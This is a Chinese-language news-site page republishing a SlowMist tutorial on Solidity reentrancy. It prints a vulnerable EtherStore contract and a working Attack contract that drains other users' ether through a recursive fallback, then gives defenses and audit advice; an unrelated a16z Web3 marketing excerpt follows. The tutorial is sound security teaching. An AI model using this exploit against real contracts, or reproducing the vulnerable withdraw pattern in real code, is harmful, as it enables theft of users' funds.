您的位置: > 欧 易 OKX 区块链新闻> 正文

打印本文             

By:小白@慢雾安全团队

背景概述

看了一个关于学习 solidity 的站(https://solidity-by-example.org),里面讲了关于 solidity 智能合约的很多漏洞,考虑到现在针对智能合约的攻击事件频频发生,不法分子盗取的加密资产越来越多,我就想写一些与智能合约安全审计相关的文章给想了解智能合约安全审计的入门者阅读,让一些对智能合约安全审计感兴趣的初学者可以学到如何识别一些常见的漏洞和如何利用这些漏洞去做什么事情。这次我们就一起先看一个很经典的漏洞 —— 重入漏洞

前置知识

重入漏洞相信大家都有所耳闻了,那么什么是重入漏洞呢?

以太坊智能合约的特点之一是合约之间可以进行相互间的外部调用。同时,以太坊的转账不仅仅局限于外部账户,合约账户同样可以拥有以太并进行转账等操作,且合约在接收以太的时候会触发 fallback 函数执行相应的逻辑,这是一种隐藏的外部调用。

我们先给重入漏洞下个定义:可以认为合约中所有的外部调用都是不安全的,都有可能存在重入漏洞。例如:如果外部调用的目标是一个攻击者可以控制的恶意的合约,那么当被攻击的合约在调用恶意合约的时候攻击者可以执行恶意的逻辑然后再重新进入到被攻击合约的内部,通过这样的方式来发起一笔非预期的外部调用,从而影响被攻击合约正常的执行逻辑。

漏洞示例

好了,看完上面的前置知识我相信大家对重入漏洞都有了一个大致的了解,那么在真实的环境中开发者写出什么样的代码会出现重入漏洞呢,下面我们来看一个比较典型的有重入漏洞的代码:

// SPDX-License-Identifier: MITpragma solidity ^0.8.3;contract EtherStore { mapping(address => uint) public balances; function deposit() public payable { balances[msg.sender] += msg.value; } function withdraw() public { uint bal = balances[msg.sender]; require(bal > 0); (bool sent, ) = msg.sender.call{value: bal}(""); require(sent, "Failed to send Ether"); balances[msg.sender] = 0; } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; }}


漏洞分析

看到这里大家可能会有疑惑了,上面的代码就是个普通的充提币的合约,凭什么说他有重入攻击呢?我们来看这个合约的 withdraw 函数,这个函数中的转账操作有一个外部调用(msg.sender.call{value: bal}),所以我们就可以认为这个合约是可能有重入漏洞的,但是具体能否产生危害还需要更深入的分析:

1. 所有的外部调用都是不安全的且合约在接收以太的时候会触发 fallback 函数执行相应的逻辑,这是一种隐藏的外部调用,这种隐藏的外部调用是否会造成危害呢?

2. 我们可以看到在 withdraw 函数中是先执行外部调用进行转账后才将账户余额清零的,那我们可不可以在转账外部调用的时候构造一个恶意的逻辑合约在合约执行 balance[msg.sender]=0 之前一直循环调用 withdraw 函数一直提币从而将合约账户清空呢?

下面我们看看攻击者编写的攻击合约中的攻击手法是否与我们的漏洞分析相同:

攻击合约

contract Attack { EtherStore public etherStore; constructor(address _etherStoreAddress) { etherStore = EtherStore(_etherStoreAddress); } // Fallback is called when EtherStore sends Ether to this contract. fallback() external payable { if (address(etherStore).balance >= 1 ether) { etherStore.withdraw(); } } function attack() external payable { require(msg.value >= 1 ether); etherStore.deposit{value: 1 ether}(); etherStore.withdraw(); } // Helper function to check the balance of this contract function getBalance() public view returns (uint) { return address(this).balance; }}


我们看到 EtherStore 合约是一个充提合约,我们可以在其中充提以太。下面我们将利用攻击合约将 EtherStore 合约中用户的余额清零的:

这里我们将引用三个角色,分别为:

用户:Alice,Bob

攻击者:Eve

1. 部署 EtherStore 合约;

2. 用户 1(Alice)和用户 2(Bob)都分别将 1 个以太币充值到 EtherStore 合约中;

3. 攻击者 Eve 部署 Attack 合约时传入 EtherStore 合约的地址;

4. 攻击者 Eve 调用 Attack.attack 函数,Attack.attack 又调用 EtherStore.deposit 函数,充值 1 个以太币到 EtherStore 合约中,此时 EtherStore 合约中共有 3 个以太,分别为 Alice、Bob 的 2 个以太和攻击者 Eve 刚刚充值进去的 1 个以太。然后 Attack.attack 又调用 EtherStore.withdraw 函数将自己刚刚充值的以太取出,此时 EtherStore 合约中就只剩下 Alice、Bob 的 2 个以太了;

5. 当 Attack.attack 调用 EtherStore.withdraw 提取了先前 Eve 充值的 1 个以太时会触发 Attack.fallback 函数。这时只要 EtherStore 合约中的以太大于或等于 1 Attack.fallback 就会一直调用 EtherStore.withdraw 函数将 EtherStore 合约中的以太提取到 Attack 合约中,直到 EtherStore 合约中的以太小于 1 。这样攻击者 Eve 会得到 EtherStore 合约中剩下的 2 个以太币(Alice、Bob 充值的两枚以太币)。

下面是攻击者的函数调用流程图:

solidity

修复建议

看了上面的攻击手法相信大家对重入漏洞都会有一个自己的认知,但是只会攻击可不行,我们的目的是为了防御,那么作为开发人员如何避免写出漏洞代码还有作为审计人员如何快速发现问题代码呢,下面我们就以这两个身份来分析如何防御重入漏洞和如何在代码中快速找出重入漏洞:

(1)作为开发人员

站在开发者的角度我们需要做的是写好代码,避免重入漏洞的产生。

1. 写代码时需要遵循先判断,后写入变量在进行外部调用的编码规范(Checks-Effects-Interactions);

2. 加入防重入锁。

下面是一个防重入锁的代码示例:

// SPDX-License-Identifier: MITpragma solidity ^0.8.3; contract ReEntrancyGuard { bool internal locked; modifier noReentrant() { require(!locked, "No re-entrancy"); locked = true; _; locked = false; }}


(2)作为审计人员

作为审计人员我们需要关注的是重入漏洞的特征:所有涉及到外部合约调用的代码位置都是不安全的。这样在审计过程中需要重点关注外部调用,然后推演外部调用可能产生的危害,这样就能判断这个地方是否会因为重入点而产生危害。


a16z 合伙人:Web3 的新思维、新策略和新指标   

每个公司都面临着不同的“冷启动问题”:你如何从无到有?如何获取客户?如何创造网络效应——即当更多的人使用你的产品或服务时,你的产品或服务对客户而言变得更有价值——从而激励更多的用户到来?

简而言之,你如何“进入市场”并说服潜在客户在你的产品或服务上花费他们的金钱、时间和注意力?

Web2 是由大型中心化产品/服务定义的互联网时代,比如亚马逊、eBay、Facebook 和 Twitter,其中绝大多数的价值是由平台本身而不是用户产生。大多数 Web2 组织对于上述问题的回应是对销售和营销团队进行大量投资,这是传统的进入市场 (go-to-market, GTM) 策略的一部分,GTM 的重点是创造潜在客户、获取和留住客户。

但近年来,一种全新的组织建设模式出现了。这种新模式利用去中心化的技术,通过被称为代币 (Token) 的数字原语,将用户带入所有者的角色,而不是由企业控制——即由中心化的领导来制定有关产品或服务的所有决策,甚至在使用用户数据和免费的、用户生成的内容时也是如此。

这种被称为 Web3 的新模式,彻底改变了这些新型公司的 GTM (进入市场) 理念。虽然一些传统的用户获取框架仍然是相关的,但 Token 的引入和新的组织结构 (如去中心化自治组织(DAO))需要各种 GTM 策略。由于 Web3 对很多人来说还是个新事物,但在这一领域有巨大的发展空间,在这篇文章中,我将分享一些在这一背景下思考 GTM 的新框架,以及这个生态系统中可能存在的不同类型的组织。我还将提供一些技巧和战术,以帮助那些希望伴随 Web3 的不断发展,创建自己的 Web3 GTM 策略的构建者。

01. 全新 GTM 策略的催化剂:代币

用户获取漏斗的概念是 GTM 的核心,大多数企业都非常熟悉这个概念:从漏斗顶部的意识和潜在用户生成 (Awareness & Lead Generation),到漏斗底部的转化 (Conversion) 和留住用户 (Retention),如下图所示。因此,传统的 Web2 GTM 通过这个非常线性的用户获取视角来解决冷启动问题,包括定价、市场营销、合作伙伴、销售渠道映射和销售队伍优化等领域。成功的衡量标准包括网站点击率、每个客户为企业带来的收入等等。

Web3 改变了启动新网络的整个方法,因为 Token (代币) 为解决冷启动问题提供了一种替代传统方式的方法。核心开发团队可以使用 Token 来吸引早期用户,而不是在传统营销上花费资金来吸引和获取潜在用户,在网络效应还不明显或尚未开始时,这些用户可以因为他们的早期贡献而获得奖励。这些早期用户不仅是将更多的人带入该网络的传道者 (他们也希望通过自己的贡献获得回报),而且从本质上说,这使得 Web3 中的早期用户比 Web2 中的传统业务开发或销售人员带来更强大的影响力

比如借贷协议 Compound (披露,a16z 是该协议以及本文讨论的其他组织的投资方),该协议使用代币来激励早期的放贷人 (lenders) 和借款人 (borrowers),也即以 COMP 代币的形式为参与其「流动性挖矿」的用户提供额外的奖励,从而“引导流动性”。该协议的任何用户,无论是放贷人还是借款人,都会获得 COMP 代币奖励。该流动性挖矿计划于 2020 年启动后,Compound 协议中的总锁仓价值 (TVL) 从 1 亿美元跃升至 6 亿美元。值得注意的是,虽然代币奖励能够吸引用户,但这种方式本身并不足以让用户变得具有“粘性”,对此稍后再详细介绍。虽然传统公司确实通过股权激励员工,但它们很少在经济上长期激励客户。

总结一下:在 Web2 中,GTM (进入市场) 的主要利益相关者是客户,通常是通过销售和市场营销获得的;而在 Web3 中,某个组织的 GTM 利益相关者不仅包括他们的客户/用户,还包括他们的开发者、投资者和合伙人。因此,许多 Web3 公司发现社区比销售和市场营销角色更重要。

02. Web3 中的 GTM 矩阵

对于 Web3 组织而言,根据其组织结构 (中心化 vs 去中心化) 和经济激励 (没有 Token vs. 使用 Token),其 GTM (进入市场) 策略取决于该组织在下图矩阵中的位置:

a16z 合伙人:Web3 的新思维、新策略和新指标

撰文:Maggie Hsu,a16z 合伙人编辑:南风   ...

关于我们

支持iOS|android|windows等平台

  • 用户支持
  • 帮助中心
  • 服务条款
微信二维码
欧 易 (OKX) 数字货币交易平台 Powered by OKX
QR code